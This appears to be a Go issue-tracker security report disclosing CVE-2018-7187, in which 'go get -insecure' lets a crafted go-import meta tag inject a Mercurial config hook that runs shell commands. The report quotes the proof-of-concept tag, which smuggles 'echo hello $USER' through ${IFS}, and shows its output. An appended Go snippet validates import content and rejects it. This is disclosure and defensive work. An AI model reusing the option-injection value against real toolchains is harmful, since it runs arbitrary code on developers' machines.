Closed
Labels: CherryPickApproved, FrozenDueToAge, Security
Description
I contacted security@golang.org about this and was allowed to create a public issue.
This has been assigned CVE-2018-7187.
What version of Go are you using (go version)?
go version go1.9.4 linux/amd64
(earlier versions are also affected)
Does this issue reproduce with the latest release?
Yes.
What did you do?
The go get implementation, when the -insecure command-line option is used, does not validate the import path, which allows remote attackers to execute arbitrary OS commands via a crafted website.
For example, this command should execute echo hello $USER:
go get -insecure khashaev.ru/go-vuln
See https://khashaev.ru/go-vuln/index.html:
<meta name="go-import" content="khashaev.ru/go-vuln hg --config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null">
The proof of concept presented above is targeting Mercurial.
What did you expect to see?
package khashaev.ru/go-vuln: unrecognized import path "khashaev.ru/go-vuln"
What did you see instead?
hello inviz
abort: repository /home/inviz/go/src/khashaev.ru/go-vuln not found!
package khashaev.ru/go-vuln: exit status 255
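The repo-root field in the go-import tag quoted in the report starts with --config= and only contains https:// near its end. The Go sketch below is an added example, not code from the report or from the Go project. It validates a go-import content string so that such a value is rejected before it can reach a VCS command line. The function names, the VCS and scheme allowlists, and the example.org value are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Assumed allowlists for this example; adjust to local policy.
var knownVCS = map[string]bool{"git": true, "hg": true, "svn": true, "bzr": true}
var okSchemes = map[string]bool{"https": true, "ssh": true}

// weakCheck (hypothetical) is a substring test; the PoC value embeds "https://" and passes it.
func weakCheck(repoRoot string) bool { return strings.Contains(repoRoot, "://") }

// validateGoImport parses "<prefix> <vcs> <repo-root>" and rejects option-like or non-URL roots.
func validateGoImport(content string) (prefix, vcs, root string, err error) {
	f := strings.Fields(content)
	if len(f) != 3 {
		return "", "", "", errors.New("go-import needs exactly 3 fields")
	}
	prefix, vcs, root = f[0], f[1], f[2]
	if !knownVCS[vcs] {
		return "", "", "", fmt.Errorf("unknown vcs %q", vcs)
	}
	if strings.HasPrefix(root, "-") {
		return "", "", "", errors.New("repo root looks like a command-line option")
	}
	u, perr := url.Parse(root)
	if perr != nil {
		return "", "", "", fmt.Errorf("repo root is not a URL: %v", perr)
	}
	if !okSchemes[u.Scheme] || u.Host == "" {
		return "", "", "", fmt.Errorf("repo root %q: need https or ssh URL with a host", root)
	}
	return prefix, vcs, root, nil
}

// pocContent is the content attribute quoted in the issue.
const pocContent = `khashaev.ru/go-vuln hg --config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null`

func main() {
	fmt.Println("weak check accepts PoC root:", weakCheck(strings.Fields(pocContent)[2]))
	_, _, _, err := validateGoImport(pocContent)
	fmt.Println("strict validation:", err)
	_, _, root, err := validateGoImport("example.org/pkg git https://example.org/pkg.git") // constructed value
	fmt.Println(root, err)
}
```

Independently of this validation, passing an end-of-options marker such as -- before positional arguments, where the VCS tool supports it, keeps a leading dash from being parsed as an option.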